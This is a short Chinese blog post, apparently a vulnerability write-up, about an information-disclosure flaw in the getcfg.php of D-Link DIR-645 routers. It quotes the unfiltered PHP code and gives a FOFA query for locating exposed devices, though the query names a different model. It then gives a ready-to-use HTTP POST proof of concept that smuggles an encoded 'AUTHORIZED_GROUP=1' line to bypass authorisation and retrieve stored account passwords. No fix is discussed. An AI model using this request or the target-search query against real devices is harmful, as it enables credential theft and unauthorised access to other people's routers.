0
点赞
收藏
分享

微信扫一扫

D-Link DIR-645 信息泄露漏洞

一、 D-Link DIR-645 getcfg.php 文件由于过滤不严格导致信息泄露漏洞。

$SERVICE_COUNT = cut_count($_POST["SERVICES"], ",");

TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]);

$SERVICE_INDEX = 0;

while ($SERVICE_INDEX < $SERVICE_COUNT)

{

    $GETCFG_SVC = cut($_POST["SERVICES"], $SERVICE_INDEX, ",");

    TRACE_debug("GETCFG: serivce[".$SERVICE_INDEX."] = ".$GETCFG_SVC);

    if ($GETCFG_SVC!="")

    {

        $file = "/htdocs/webinc/getcfg/".$GETCFG_SVC.".xml.php";

        /* GETCFG_SVC will be passed to the child process. */

        if (isfile($file)=="1") dophp("load", $file);

    }

    $SERVICE_INDEX++;

}

可以看到 $GETCFG_SVC 没有任何过滤直接获取了 POST 传递过来的SERVICES的值。如果$GETCFG_SVC不为空,则进行文件读取。可以读取存储此设备信息的DEVICE.ACCOUNT .xml .php等文件。

二、漏洞复现:

测绘fofa搜索:app="D_Link-DIR-868L"

使用poc访问漏洞页面即可获取到账号密码

POST /getcfg.php HTTP/1.1

Host: {{Hostname}}

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0

Content-Length: 70

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Connection: close

Content-Type: application/x-www-form-urlencoded

DNT: 1

Upgrade-Insecure-Requests: 1

 

SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1

(SERVICES=DEVICE.ACCOUNT&attack=ture

AUTHORIZED_GROUP=1)

返回代码:

D-Link DIR-645 信息泄露漏洞_html


举报

相关推荐

0 条评论